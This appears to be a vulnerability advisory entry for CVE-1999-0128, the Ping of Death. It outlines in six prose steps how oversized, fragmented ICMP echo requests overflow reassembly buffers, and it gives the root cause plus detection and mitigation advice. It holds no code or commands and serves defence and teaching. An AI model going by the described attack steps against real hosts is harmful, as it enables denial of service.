Source: cve@mitre.org
Oversized ICMP ping packets can result in a denial of service, aka Ping o' Death.
Ping of Death (CVE-1999-0128) is a classic denial-of-service (DoS) vulnerability that can crash or destabilize systems by sending oversized ICMP echo request packets. This vulnerability exploits a flaw in how systems handle fragmented ICMP packets, leading to a buffer overflow or other memory corruption issues, ultimately causing a service outage.
Step 1: Packet Crafting: The attacker crafts an ICMP echo request (ping) packet that is larger than the maximum allowed packet size for the network interface.
Step 2: Fragmentation: The oversized packet is fragmented into multiple smaller packets by the attacker's system or an intermediate router, if necessary.
Step 3: Packet Delivery: The fragmented packets are sent to the target system.
Step 4: Reassembly: The target system receives the fragmented packets and attempts to reassemble them.
Step 5: Exploitation: Due to a lack of proper size validation, the reassembly process overflows a buffer or triggers other memory corruption, leading to a system crash or instability.
Step 6: Denial of Service: The target system becomes unresponsive or crashes, resulting in a denial of service.
Root Cause: The vulnerability stems from improper handling of fragmented ICMP packets. When a system receives a large ICMP echo request (ping) packet that exceeds the maximum packet size, it is fragmented into smaller packets. The vulnerable system, upon reassembling these fragments, fails to properly validate the size or integrity of the reassembled packet. This can lead to a buffer overflow when the system attempts to store the oversized packet, overwriting critical memory regions. Alternatively, the malformed packet can trigger other memory corruption issues, leading to a system crash or instability. The specific flaw lies in the lack of robust input validation and size checks during the reassembly process of fragmented ICMP packets. This allows attackers to craft packets that, when reassembled, exceed the allocated buffer size or cause other memory-related errors.
This vulnerability is not typically associated with specific APT groups due to its age and the widespread patching. However, it could be used as part of a broader reconnaissance or DoS attack. Not listed on CISA KEV.
Network Intrusion Detection Systems (NIDS) can be configured to detect oversized ICMP packets or malformed ICMP fragments.
Analyze network traffic for ICMP packets exceeding the standard MTU (Maximum Transmission Unit) size.
Monitor system logs for unusual activity or errors related to ICMP processing.
Use packet capture tools (e.g., tcpdump, Wireshark) to inspect ICMP traffic and identify potentially malicious packets.
Ensure that all systems are patched with the latest security updates from the vendor.
Implement network-based filtering to block or rate-limit ICMP traffic, especially from untrusted sources.
Configure firewalls to drop oversized or malformed ICMP packets.
Regularly audit network configurations and security policies to ensure they are up-to-date.
Implement intrusion detection and prevention systems (IDS/IPS) to monitor and block malicious ICMP traffic.